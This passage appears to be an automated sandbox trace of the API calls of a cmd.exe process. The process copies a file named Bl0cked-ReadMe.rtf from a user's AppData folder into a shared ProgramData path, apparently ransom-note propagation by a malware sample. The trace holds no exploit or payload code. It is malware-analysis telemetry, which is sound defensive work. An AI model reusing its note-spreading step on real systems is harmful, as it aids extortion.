_Mode=16384) returned 32768 [0118.841] LocalFree (hMem=0x425120) returned 0x0 [0118.841] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x12f27c, nSize=0x0, Arguments=0x12f278 | out: lpBuffer="\x10 \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9315 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9316 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9317 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9318 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9319 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9320 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9321 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9322 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9323 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 9324 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9335 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9336 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9337 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9338 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 9339 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 9340 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 9341 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9342 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9343 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9344 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9345 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9346 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9347 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9348 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9349 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 9350 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9351 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9352 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9353 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 9354 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9355 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 9356 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 9357 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 9358 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 120 os_tid = 0xf38 [0119.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd14 | out: lpSystemTimeAsFileTime=0x1efd14*(dwLowDateTime=0x844fcce0, dwHighDateTime=0x1d440a9)) [0119.383] GetCurrentProcessId () returned 0xf34 [0119.383] GetCurrentThreadId () returned 0xf38 [0119.383] GetTickCount () returned 0x2845b [0119.383] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd0c | out: lpPerformanceCount=0x1efd0c*=17617187332) returned 1 [0119.383] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0119.384] __set_app_type (_Type=0x1) [0119.384] __p__fmode () returned 0x76b331f4 [0119.384] __p__commode () returned 0x76b331fc [0119.384] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0119.384] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0119.384] GetCurrentThreadId () returned 0xf38 [0119.384] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf38) returned 0x38 [0119.384] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0119.384] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0119.384] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.385] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.385] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efca4 | out: phkResult=0x1efca4*=0x0) returned 0x2 [0119.385] VirtualQuery (in: lpAddress=0x1efcdb, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.385] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0119.385] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0119.385] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.385] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc74, dwLength=0x1c | out: lpBuffer=0x1efc74*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0119.385] GetConsoleOutputCP () returned 0x1b5 [0119.385] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.385] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0119.385] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.385] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0119.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0119.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.386] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.386] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.386] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0119.386] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.386] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0119.387] GetEnvironmentStringsW () returned 0x3e0198* [0119.387] FreeEnvironmentStringsW (penv=0x3e0198) returned 1 [0119.387] GetEnvironmentStringsW () returned 0x3e0198* [0119.387] FreeEnvironmentStringsW (penv=0x3e0198) returned 1 [0119.387] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec14 | out: phkResult=0x1eec14*=0x40) returned 0x0 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0xc0, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x1, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x1, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x0, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.387] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x40, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x40, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x40, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.388] RegCloseKey (hKey=0x40) returned 0x0 [0119.388] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec14 | out: phkResult=0x1eec14*=0x40) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x40, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x1, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x1, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x0, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x9, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x4, lpData=0x1eec20*=0x9, lpcbData=0x1eec18*=0x4) returned 0x0 [0119.388] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec1c, lpData=0x1eec20, lpcbData=0x1eec18*=0x1000 | out: lpType=0x1eec1c*=0x0, lpData=0x1eec20*=0x9, lpcbData=0x1eec18*=0x1000) returned 0x2 [0119.388] RegCloseKey (hKey=0x40) returned 0x0 [0119.388] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635f [0119.388] srand (_Seed=0x5b88635f) [0119.388] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"" [0119.388] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf\"" [0119.389] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.389] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0119.389] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.389] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.389] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.389] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0119.389] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0119.389] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0119.389] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0119.389] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0119.390] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0119.390] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0119.390] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0119.390] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0119.390] GetEnvironmentStringsW () returned 0x3e22e8* [0119.390] FreeEnvironmentStringsW (penv=0x3e22e8) returned 1 [0119.390] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.390] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.390] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0119.390] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0119.390] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0119.390] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0119.390] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0119.390] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0119.390] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0119.390] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0119.391] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef9e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.391] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef9e0, lpFilePart=0x1ef9dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef9dc*="Desktop") returned 0x18 [0119.391] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0119.391] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef75c | out: lpFindFileData=0x1ef75c) returned 0x3e0028 [0119.391] FindClose (in: hFindFile=0x3e0028 | out: hFindFile=0x3e0028) returned 1 [0119.391] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef75c | out: lpFindFileData=0x1ef75c) returned 0x3e0028 [0119.391] FindClose (in: hFindFile=0x3e0028 | out: hFindFile=0x3e0028) returned 1 [0119.391] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef75c | out: lpFindFileData=0x1ef75c) returned 0x3e0028 [0119.392] FindClose (in: hFindFile=0x3e0028 | out: hFindFile=0x3e0028) returned 1 [0119.392] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0119.392] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0119.392] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0119.392] GetEnvironmentStringsW () returned 0x3e2b08* [0119.392] FreeEnvironmentStringsW (penv=0x3e2b08) returned 1 [0119.392] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.393] GetConsoleOutputCP () returned 0x1b5 [0119.449] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.449] GetUserDefaultLCID () returned 0x409 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efb20, cchData=128 | out: lpLCData="0") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efb20, cchData=128 | out: lpLCData="0") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efb20, cchData=128 | out: lpLCData="1") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0119.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0119.450] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0119.451] GetConsoleTitleW (in: lpConsoleTitle=0x3d08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.451] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0119.451] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0119.451] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0119.452] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0119.452] _wcsicmp (_String1="type", _String2=")") returned 75 [0119.452] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0119.452] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0119.453] _wcsicmp (_String1="IF", _String2="type") returned -11 [0119.453] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0119.453] _wcsicmp (_String1="REM", _String2="type") returned -2 [0119.453] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0119.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.457] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.457] GetFileType (hFile=0x7) returned 0x2 [0119.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.458] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1efa18 | out: lpMode=0x1efa18) returned 1 [0119.458] _dup (_FileHandle=1) returned 3 [0119.458] _close (_FileHandle=1) returned 0 [0119.458] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0119.458] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\publis~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef9e8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0119.459] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0119.459] GetConsoleTitleW (in: lpConsoleTitle=0x1ef818, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.460] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0119.460] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0119.460] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0119.460] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0119.462] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0119.462] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1ef37c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef37c) returned 0x3d0e90 [0119.463] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0119.463] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0119.463] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0119.463] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee288, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0119.463] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0119.463] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.463] GetFileType (hFile=0x54) returned 0x1 [0119.463] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.463] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ee2e0 | out: lpFileSizeHigh=0x1ee2e0*=0x0) returned 0x1632 [0119.463] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.463] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.463] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.463] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.463] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.463] GetFileType (hFile=0x4c) returned 0x1 